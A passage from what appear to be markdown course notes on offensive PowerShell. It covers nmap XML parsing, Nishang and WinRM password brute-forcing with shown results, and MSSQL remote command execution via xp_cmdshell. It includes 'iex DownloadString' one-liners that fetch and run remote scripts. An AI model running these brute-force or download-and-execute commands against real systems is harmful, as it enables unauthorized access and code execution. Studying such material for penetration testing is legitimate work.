destination, int destinationIndex, int count)\n\tEndsWith Method bool EndsWith(string value), bool EndsWith(string value, System.StringComparison comparisonType), bool EndsWith(string value, bool ignoreCase, cultureinfo culture)\n\tEquals Method bool Equals(System.Object obj), bool Equals(string value), bool Equals(string value, System.StringComparison comparisonType), bool IEquatable[string].Equals(str...\n\tGetEnumerator Method System.CharEnumerator GetEnumerator(), System.Collections.Generic.IEnumerator[char] IEnumerable[char].GetEnumerator(), System.Collections.IEnumerator IEnumerabl...\n\tGetHashCode Method int GetHashCode()\n\tGetType Method type GetType()\n\tGetTypeCode Method System.TypeCode GetTypeCode(), System.TypeCode IConvertible.GetTypeCode()\n\tIndexOf Method int IndexOf(char value), int IndexOf(char value, int startIndex), int IndexOf(char value, int startIndex, int count), int IndexOf(string value), int IndexOf(str...\n\tIndexOfAny Method int IndexOfAny(char[] anyOf), int IndexOfAny(char[] anyOf, int startIndex), int IndexOfAny(char[] anyOf, int startIndex, int count)\n\tInsert Method string Insert(int startIndex, string value)\n\tIsNormalized Method bool IsNormalized(), bool IsNormalized(System.Text.NormalizationForm normalizationForm)\n\tLastIndexOf Method int LastIndexOf(char value), int LastIndexOf(char value, int startIndex), int LastIndexOf(char value, int startIndex, int count), int LastIndexOf(string value),...\n\tLastIndexOfAny Method int LastIndexOfAny(char[] anyOf), int LastIndexOfAny(char[] anyOf, int startIndex), int LastIndexOfAny(char[] anyOf, int startIndex, int count)\n\tNormalize Method string Normalize(), string Normalize(System.Text.NormalizationForm normalizationForm)\n\tPadLeft Method string PadLeft(int totalWidth), string PadLeft(int totalWidth, char paddingChar)\n\tPadRight Method string PadRight(int totalWidth), string PadRight(int totalWidth, char paddingChar)\n\tRemove Method string Remove(int startIndex, int count), string Remove(int startIndex)\n\tReplace Method string Replace(char oldChar, char newChar), string Replace(string oldValue, string newValue)\n\tSplit Method string[] Split(Params char[] separator), string[] Split(char[] separator, int count), string[] Split(char[] separator, System.StringSplitOptions options), strin...\n\tStartsWith Method bool StartsWith(string value), bool StartsWith(string value, System.StringComparison comparisonType), bool StartsWith(string value, bool ignoreCase, cultureinfo...\n\tSubstring Method string Substring(int startIndex), string Substring(int startIndex, int length)\n\tToBoolean Method bool IConvertible.ToBoolean(System.IFormatProvider provider)\n\tToByte Method byte IConvertible.ToByte(System.IFormatProvider provider)\n\tToChar Method char IConvertible.ToChar(System.IFormatProvider provider)\n\tToCharArray Method char[] ToCharArray(), char[] ToCharArray(int startIndex, int length)\n\tToDateTime Method datetime IConvertible.ToDateTime(System.IFormatProvider provider)\n\tToDecimal Method decimal IConvertible.ToDecimal(System.IFormatProvider provider)\n\tToDouble Method double IConvertible.ToDouble(System.IFormatProvider provider)\n\tToInt16 Method int16 IConvertible.ToInt16(System.IFormatProvider provider)\n\tToInt32 Method int IConvertible.ToInt32(System.IFormatProvider provider)\n\tToInt64 Method long IConvertible.ToInt64(System.IFormatProvider provider)\n\tToLower Method string ToLower(), string ToLower(cultureinfo culture)\n\tToLowerInvariant Method string ToLowerInvariant()\n\tToSByte Method sbyte IConvertible.ToSByte(System.IFormatProvider provider)\n\tToSingle Method float IConvertible.ToSingle(System.IFormatProvider provider)\n\tToString Method string ToString(), string ToString(System.IFormatProvider provider), string IConvertible.ToString(System.IFormatProvider provider)\n\tToType Method System.Object IConvertible.ToType(type conversionType, System.IFormatProvider provider)\n\tToUInt16 Method uint16 IConvertible.ToUInt16(System.IFormatProvider provider)\n\tToUInt32 Method uint32 IConvertible.ToUInt32(System.IFormatProvider provider)\n\tToUInt64 Method uint64 IConvertible.ToUInt64(System.IFormatProvider provider)\n\tToUpper Method string ToUpper(), string ToUpper(cultureinfo culture)\n\tToUpperInvariant Method string ToUpperInvariant()\n\tTrim Method string Trim(Params char[] trimChars), string Trim()\n\tTrimEnd Method string TrimEnd(Params char[] trimChars)\n\tTrimStart Method string TrimStart(Params char[] trimChars)\n\tChars ParameterizedProperty char Chars(int index) {get;}\n\tLength Property int Length {get;}\n\t\n\t\n\t TypeName: System.Xml.XmlElement\n\t\n\tName MemberType Definition\n\t---- ---------- ----------\n\tToString CodeMethod static string XmlNode(psobject instance)\n\tAppendChild Method System.Xml.XmlNode AppendChild(System.Xml.XmlNode newChild)\n\tClone Method System.Xml.XmlNode Clone(), System.Object ICloneable.Clone()\n\tCloneNode Method System.Xml.XmlNode CloneNode(bool deep)\n\tCreateNavigator Method System.Xml.XPath.XPathNavigator CreateNavigator(), System.Xml.XPath.XPathNavigator IXPathNavigable.CreateNavigator()\n\tEquals Method bool Equals(System.Object obj)\n\tGetAttribute Method string GetAttribute(string name), string GetAttribute(string localName, string namespaceURI)\n\tGetAttributeNode Method System.Xml.XmlAttribute GetAttributeNode(string name), System.Xml.XmlAttribute GetAttributeNode(string localName, string namespaceURI)\n\tGetElementsByTagName Method System.Xml.XmlNodeList GetElementsByTagName(string name), System.Xml.XmlNodeList GetElementsByTagName(string localName, string namespaceURI)\n\tGetEnumerator Method System.Collections.IEnumerator GetEnumerator(), System.Collections.IEnumerator IEnumerable.GetEnumerator()\n\tGetHashCode Method int GetHashCode()\n\tGetNamespaceOfPrefix Method string GetNamespaceOfPrefix(string prefix)\n\tGetPrefixOfNamespace Method string GetPrefixOfNamespace(string namespaceURI)\n\tGetType Method type GetType()\n\tHasAttribute Method bool HasAttribute(string name), bool HasAttribute(string localName, string namespaceURI)\n\tInsertAfter Method System.Xml.XmlNode InsertAfter(System.Xml.XmlNode newChild, System.Xml.XmlNode refChild)\n\tInsertBefore Method System.Xml.XmlNode InsertBefore(System.Xml.XmlNode newChild, System.Xml.XmlNode refChild)\n\tNormalize Method void Normalize()\n\tPrependChild Method System.Xml.XmlNode PrependChild(System.Xml.XmlNode newChild)\n\tRemoveAll Method void RemoveAll()\n\tRemoveAllAttributes Method void RemoveAllAttributes()\n\tRemoveAttribute Method void RemoveAttribute(string name), void RemoveAttribute(string localName, string namespaceURI)\n\tRemoveAttributeAt Method System.Xml.XmlNode RemoveAttributeAt(int i)\n\tRemoveAttributeNode Method System.Xml.XmlAttribute RemoveAttributeNode(System.Xml.XmlAttribute oldAttr), System.Xml.XmlAttribute RemoveAttributeNode(string localName, string namespace...\n\tRemoveChild Method System.Xml.XmlNode RemoveChild(System.Xml.XmlNode oldChild)\n\tReplaceChild Method System.Xml.XmlNode ReplaceChild(System.Xml.XmlNode newChild, System.Xml.XmlNode oldChild)\n\tSelectNodes Method System.Xml.XmlNodeList SelectNodes(string xpath), System.Xml.XmlNodeList SelectNodes(string xpath, System.Xml.XmlNamespaceManager nsmgr)\n\tSelectSingleNode Method System.Xml.XmlNode SelectSingleNode(string xpath), System.Xml.XmlNode SelectSingleNode(string xpath, System.Xml.XmlNamespaceManager nsmgr)\n\tSetAttribute Method void SetAttribute(string name, string value), string SetAttribute(string localName, string namespaceURI, string value)\n\tSetAttributeNode Method System.Xml.XmlAttribute SetAttributeNode(System.Xml.XmlAttribute newAttr), System.Xml.XmlAttribute SetAttributeNode(string localName, string namespaceURI)\n\tSupports Method bool Supports(string feature, string version)\n\tWriteContentTo Method void WriteContentTo(System.Xml.XmlWriter w)\n\tWriteTo Method void WriteTo(System.Xml.XmlWriter w)\n\tItem ParameterizedProperty System.Xml.XmlElement Item(string name) {get;}, System.Xml.XmlElement Item(string localname, string ns) {get;}\n\targs Property string args {get;set;}\n\tdebugging Property System.Xml.XmlElement debugging {get;}\n\thost Property System.Object[] host {get;}\n\trunstats Property System.Xml.XmlElement runstats {get;}\n\tscaninfo Property System.Xml.XmlElement scaninfo {get;}\n\tscanner Property string scanner {get;set;}\n\tstart Property string start {get;set;}\n\tstartstr Property string startstr {get;set;}\n\ttaskbegin Property System.Object[] taskbegin {get;}\n\ttaskend Property System.Object[] taskend {get;}\n\tverbose Property System.Xml.XmlElement verbose {get;}\n\tversion Property string version {get;set;}\n\txmloutputversion Property string xmloutputversion {get;set;}\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop> $nmap.nmaprun.host\n\t\n\tstatus address\n\t------ -------\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus address\n\tstatus {address, address}\n\tstatus {address, address}\n\tstatus {address, address}\n\tstatus {address, address}\n\tstatus {address, address}\n\tstatus {address, address}\n\tstatus {address, address}\n\tstatus address\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop> $nmap.nmaprun.host.Address\n\t\n\tOverloadDefinitions\n\t-------------------\n\tSystem.Object&, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 Address(int )\n\t\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop> $nmap.nmaprun.host.status\n\t\n\tstate reason reason_ttl\n\t----- ------ ----------\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tdown no-response 0\n\tup arp-response 0\n\tup arp-response 0\n\tup arp-response 0\n\tup arp-response 0\n\tup arp-response 0\n\tup arp-response 0\n\tup arp-response 0\n\tup user-set 0\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop>\n\t```\n\n- Automating Nessus and parsing reports\n - [Posh-NVS](https://github.com/darkoperator/Posh-NVS)\n\n\n###### Interesting Reads\n\n- [ScanDiff](https://github.com/hardwaterhacker/scandiff)\n- Parse nmap XML with Powershell\n - [Link 1](https://cyber-defense.sans.org/blog/2009/06/11/powershell-script-to-parse-nmap-xml-output/)\n - [Link 2](https://poshsecurity.com/blog/2011/8/23/automating-nmap-analysis-with-powershell.html)\n- Automating Nessus with Posh-SecMod\n - [Link 1](https://www.darkoperator.com/blog/2013/4/15/using-posh-secmod-to-automate-nessus-part1.html)\n - [Link 2](https://www.darkoperator.com/blog/2013/4/16/using-posh-secmod-powershell-module-to-automate-nessus-part.html)" }, { "path": "43-Bruteforce-Part-1.md", "content": "#### 43. Bruteforce Part 1\n\n###### Brute-Forcing\n\n- Brute-Force in Nishang:\n - Active Directory\n - FTP\n - MSSQL Server\n - Sharepoint\n- Attacking machine must be a part of the domain\n\n```PowerShell\nPS C:\\> Enter-PSSession -ComputerName WIN-2012-DC -Credential PFPT\\Administrator\n```\n\n```PowerShell\n[win-2012-dc]: PS C:\\Users\\Administrator\\Documents> cd ..\n[win-2012-dc]: PS C:\\Users\\Administrator> cd .\\Desktop\n[win-2012-dc]: PS C:\\Users\\Administrator\\Desktop> cd .\\nishang-master\n[win-2012-dc]: PS C:\\Users\\Administrator\\Desktop\\nishang-master> Import-Module .\\nishang.psm1\nWARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved\nverbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\nWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\n[win-2012-dc]: PS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\n[win-2012-dc]: PS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Command -Module nishang\n\nCommandType Name ModuleName\n----------- ---- ----------\nFunction Add-Exfiltration nishang\nFunction Add-Persistence nishang\nFunction Add-RegBackdoor nishang\nFunction Add-ScrnSaveBackdoor nishang\nFunction Base64ToString nishang\nFunction Check-VM nishang\nFunction ConvertTo-ROT13 nishang\nFunction Copy-VSS nishang\nFunction Create-MultipleSessions nishang\nFunction DNS_TXT_Pwnage nishang\nFunction Do-Exfiltration nishang\nFunction Download nishang\nFunction Download_Execute nishang\nFunction Download-Execute-PS nishang\nFunction Enable-DuplicateToken nishang\nFunction Execute-Command-MSSQL nishang\nFunction Execute-DNSTXT-Code nishang\nFunction Execute-OnTime nishang\nFunction ExetoText nishang\nFunction FireBuster nishang\nFunction FireListener nishang\nFunction Get-Information nishang\nFunction Get-LsaSecret nishang\nFunction Get-PassHashes nishang\nFunction Get-PassHints nishang\nFunction Get-Unconstrained nishang\nFunction Get-WebCredentials nishang\nFunction Get-Wlan-Keys nishang\nFunction Get-WmiShellOutput nishang\nFunction Gupt-Backdoor nishang\nFunction HTTP-Backdoor nishang\nFunction Invoke-ADSBackdoor nishang\nFunction Invoke-AmsiBypass nishang\nFunction Invoke-BruteForce nishang\nFunction Invoke-CredentialsPhish nishang\nFunction Invoke-Decode nishang\nFunction Invoke-Encode nishang\nFunction Invoke-Interceptor nishang\nFunction Invoke-JSRatRegsvr nishang\nFunction Invoke-JSRatRundll nishang\nFunction Invoke-Mimikatz nishang\nFunction Invoke-MimikatzWDigestDowngrade nishang\nFunction Invoke-Mimikittenz nishang\nFunction Invoke-NetworkRelay nishang\nFunction Invoke-PortScan nishang\nFunction Invoke-PoshRatHttp nishang\nFunction Invoke-PoshRatHttps nishang\nFunction Invoke-PowerShellIcmp nishang\nFunction Invoke-PowerShellTcp nishang\nFunction Invoke-PowerShellUdp nishang\nFunction Invoke-PowerShellWmi nishang\nFunction Invoke-Prasadhak nishang\nFunction Invoke-PSGcat nishang\nFunction Invoke-PsGcatAgent nishang\nFunction Invoke-PsUACme nishang\nFunction Invoke-SSIDExfil nishang\nFunction Out-CHM nishang\nFunction Out-DnsTxt nishang\nFunction Out-Excel nishang\nFunction Out-HTA nishang\nFunction Out-Java nishang\nFunction Out-JS nishang\nFunction Out-RundllCommand nishang\nFunction Out-SCF nishang\nFunction Out-SCT nishang\nFunction Out-Shortcut nishang\nFunction Out-WebQuery nishang\nFunction Out-Word nishang\nFunction Parse_Keys nishang\nFunction Remove-Persistence nishang\nFunction Remove-PoshRat nishang\nFunction Remove-Update nishang\nFunction Run-EXEonRemote nishang\nFunction Show-TargetScreen nishang\nFunction Speak nishang\nFunction Start-CaptureServer nishang\nFunction StringtoBase64 nishang\nFunction TexttoEXE nishang\n\n[win-2012-dc]: PS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\n[win-2012-dc]: PS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Help Invoke-BruteForce -Examples\n\nNAME\n Invoke-BruteForce\n\nSYNOPSIS\n Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n PS >Invoke-BruteForce -ComputerName SQLServ01 -UserList C:\\test\\users.txt -PasswordList C:\\test\\wordlist.txt -Service SQL -Verbose\n\n\n Brute force a SQL Server SQLServ01 for users listed in users.txt and passwords in wordlist.txt\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n PS >Invoke-BruteForce -ComputerName targetdomain.com -UserList C:\\test\\users.txt -PasswordList C:\\test\\wordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose\n\n\n Brute force a Domain Controller of targetdomain.com for users listed in users.txt and passwords in wordlist.txt.\n Since StopOnSuccess is specified, the brute forcing stops on first success.\n\n\n\n\n -------------------------- EXAMPLE 3 --------------------------\n\n PS >cat C:\\test\\servers.txt | Invoke-BruteForce -UserList C:\\test\\users.txt -PasswordList C:\\test\\wordlist.txt -Service SQL -Verbose\n\n\n Brute force SQL Service on all the servers specified in servers.txt\n\n\n[win-2012-dc]: PS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\n[win-2012-dc]: PS C:\\Users\\Administrator\\Desktop\\nishang-master> Invoke-BruteForce -ComputerName WIN-2012-DC -UserList ..\\user.txt -PasswordList ..\\500-worst-passwords.txt -Service ActiveDirectory\nBrute Forcing Active Directory WIN-2012-DC\n[win-2012-dc]: PS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n" }, { "path": "44-Bruteforce-Part-2.md", "content": "#### 44. Bruteforce Part 2\n\n###### Brute Forcing\n\r- [```Get-WinRMPassword```](https://poshsecurity.com/blog/2014/3/20/powershell-winrm-get-winrmpassword.html)\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> . .\\Get-WinRMPassword.ps1\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Get-Help Get-WinRMPassword -Examples\n\nNAME\n Get-WinRMPassword\n\nSYNOPSIS\n Simple bruteforce attack upon a Windows machine running WinRM\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>get-winrmpassword -UserName Administrator -ComputerName myvictim -WordList c:\\mywordlist.txt\n\n\n Will read mywordlist.txt and for each entry in that list, try Administrator:\n\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Get-WinRMPassword -username John -ComputerName JOHN-PC -wordlist .\\pass.txt\nYou cannot call a method on a null-valued expression.\nAt C:\\Users\\Administrator\\Desktop\\Get-WinRMPassword.ps1:85 char:12\n+ } elseif (-not $ourerror.ErrorDetails.Message.Contains(\"The user name or passwo ...\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : InvalidOperation: (:) [], RuntimeException\n + FullyQualifiedErrorId : InvokeMethodOnNull\n\nPassword Found: Ab12345\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> Get-WinRMPassword -username John -ComputerName JOHN-PC -wordlist .\\pass.txt -Verbose\nVERBOSE: Trying Administrator\nYou cannot call a method on a null-valued expression.\nAt C:\\Users\\Administrator\\Desktop\\Get-WinRMPassword.ps1:85 char:12\n+ } elseif (-not $ourerror.ErrorDetails.Message.Contains(\"The user name or passwo ...\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : InvalidOperation: (:) [], RuntimeException\n + FullyQualifiedErrorId : InvokeMethodOnNull\n\nVERBOSE: Trying Ab12345\nPassword Found: Ab12345\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n- ```Get-WmiPassword```\n\n```PowerShell\nGet-WmiPassword -username John -ComputerName JOHN-PC -wordlist .\\pass.txt\n```" }, { "path": "45-Exploitation-Executing-Scripts-on-MySQL.md", "content": "#### 45. Exploitation: Executing Scripts on MySQL\n\n###### Install SQL Server\n\n- [SQL Server 2012 - Installation step by step](https://www.youtube.com/watch?v=4WEFTQ3VJNg)\n- [How to install SQL Server 2012 on Windows Server 2012 R2 (VMware workstation 9.0)](https://www.youtube.com/watch?v=A-Nq9YDJPas)\n\n###### Execute-Command-MSSQL\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Import-Module .\\nishang.psm1\nWARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapprov\ncommand again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\nWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Help Execute-Command-MSSQL -Examples\n\nNAME\n Execute-Command-MSSQL\n\nSYNOPSIS\n Nishang payload which could be used to execute commands remotely on a MS SQL server.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n PS>Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234\n\n\n\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n PS>Execute-Command-MSSQL -ComputerName 192.168.1.10 -UserName sa -Password sa1234\n\n\n\n\n\n\n\n -------------------------- EXAMPLE 3 --------------------------\n\n PS>Execute-Command-MSSQL -ComputerName target -UserName sa -Password sa1234\n\n\n Connecting to target...\n Enabling XP_CMDSHELL...\n Do you want a PowerShell shell (P) or a SQL Shell (S) or a cmd shell (C): P\n Starting PowerShell on the target..\n PS target> iex ((New-Object Net.Webclient).downloadstring(''http://192.168.254.1/Get-Information.ps1''));Get-Information\n\n\n Use above to execute scripts on a target.\n\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\> iex (New-Object Net.Webclient).DownloadString(\"http://10.0.0.129:8000/log.txt\")\nContents of file\nPS C:\\>\n```\n\n- ```log.txt``` file contents\n\n```\nhttp://10.0.0.129:8000/log.txt\n```\n\n```\n\"Contents of file\"\n```\n\n- [Reading the contents of a remote file using Powershell](https://stackoverflow.com/questions/1973880/download-url-content)" }, { "path": "46-Client-Side-Attacks-Part-1.md", 